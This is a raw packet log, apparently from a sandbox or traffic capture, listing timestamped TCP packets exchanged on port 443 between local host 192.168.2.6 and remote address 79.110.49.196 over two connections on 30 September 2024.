Sep 30, 2024 14:20:20.269182920 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.269263983 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.269273043 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.269323111 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.352380991 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.352407932 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.352572918 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.352596998 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.352654934 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.353255033 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.353276968 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.353354931 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.353363991 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.353408098 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.354429960 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.354454041 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.354528904 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.354537010 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.354579926 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.355598927 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.355619907 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.355680943 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.355688095 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.355725050 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.355746984 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.356487036 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.356511116 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.356587887 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.356595993 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.356646061 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.357422113 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.357441902 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.357508898 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.357517004 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.357562065 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.358530998 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.358551025 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.358602047 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.358608961 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.358639002 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.358659029 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.359230995 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.359251976 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.359313011 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.359321117 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.359369993 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.439131975 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.439155102 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.439357996 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.439378023 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.439439058 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.439830065 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.439850092 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.439915895 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.439924955 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.439975023 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.440500975 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.440521955 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.440589905 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.440598965 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.440646887 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.441270113 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.441309929 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.441359997 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.441366911 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.441406012 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.441427946 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.442114115 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.442133904 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.442198038 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.442203999 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.442239046 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.442255020 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.445372105 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.445403099 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.445466042 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.445472956 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.445513010 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.445528984 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.445806026 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.445827007 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.445889950 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.445898056 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.445943117 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.446230888 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.446252108 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.446312904 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.446321011 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.446367979 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.526200056 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.526226997 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.526387930 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.526397943 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.526456118 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.526916027 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.526945114 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.526988029 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.526994944 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.527024984 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.527044058 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.527517080 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.527539015 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.527605057 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.527612925 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.527688980 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.528532982 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.528553009 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.528610945 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.528619051 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.528626919 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.528642893 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.528676987 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.528683901 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.528714895 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.528734922 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.529511929 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.529519081 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.529587030 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.529592991 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.529619932 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.529642105 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.530241966 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530270100 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530333042 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.530339956 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530381918 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530385971 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.530396938 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530417919 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530455112 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.530462027 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.530483961 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.530540943 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.612711906 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.612745047 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.612852097 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.612868071 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.612901926 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.612922907 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.613610029 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.613629103 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.613698959 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.613707066 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.613749981 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.614068985 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.614097118 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.614164114 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.614171982 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.614217997 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.614989996 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615022898 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615067959 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.615073919 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615125895 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.615582943 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615592003 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615618944 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615662098 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.615663052 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615680933 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.615703106 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.615736961 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.616095066 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.616133928 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.616195917 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.616255045 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.616271973 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.638856888 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.638897896 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.639084101 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.639368057 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.639389992 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.287759066 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.299631119 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.299644947 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.555033922 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.555057049 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.555071115 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.555140972 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.555160046 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.555258989 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.646533012 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.646553993 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.646680117 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.646692038 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.646835089 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.648201942 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.648219109 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.648288012 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.648299932 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.648324013 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.648350954 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.738881111 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.738902092 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.739018917 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.739033937 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.739090919 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.740175962 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.740192890 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.740274906 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.740283012 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.740336895 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.741899014 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.741914988 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.742012024 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.742019892 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.742068052 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.809139967 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.809156895 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.809299946 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.809310913 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.809356928 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.831332922 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.831348896 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.831420898 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.831437111 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.831516981 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.832330942 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.832348108 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.832405090 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.832412958 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.832437038 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.832464933 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.833161116 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.833175898 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.833256960 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.833265066 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.833314896 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.834131002 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.834151030 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.834423065 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.834431887 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.834538937 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.882055998 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.882075071 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.882194042 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.882203102 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.882252932 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.894169092 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.894192934 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.894301891 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.894310951 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.894356012 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.901483059 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.901505947 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.901572943 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.901583910 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.901604891 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.901628017 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.923693895 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.923710108 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.923789978 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.923800945 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.923821926 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.923896074 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.924504042 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.924520016 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.924571991 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.924578905 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.924624920 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.924624920 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.924938917 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.924952984 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.925040960 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.925050020 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.925142050 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.925759077 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.925775051 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.925853968 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.925853968 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.925863028 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.925904989 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.926361084 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.926376104 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.926477909 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.926486015 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.926575899 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.972700119 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.972718954 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.972887039 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.972898960 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.972949982 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.983565092 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.983587027 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.983709097 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.983716965 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.983767986 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.994062901 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.994087934 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.994189978 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:21.994199038 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:21.994249105 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.016813993 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.016829967 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.016985893 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.017004967 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.017077923 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.017476082 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.017492056 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.017606020 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.017613888 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.017678976 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.018189907 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.018207073 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.018282890 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.018291950 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.018346071 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.018752098 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.018769979 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.018862009 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.018871069 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.018934011 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.019530058 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.019546032 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.019638062 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.019648075 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.019706011 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.065021992 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.065038919 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.065145969 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.065156937 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.065205097 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.076220989 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.076236963 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.076358080 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.076365948 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.076453924 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.086715937 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.086733103 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.086847067 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.086854935 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.086918116 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.108685970 CEST	443	49740	79.110.49.196	192.168.2.6
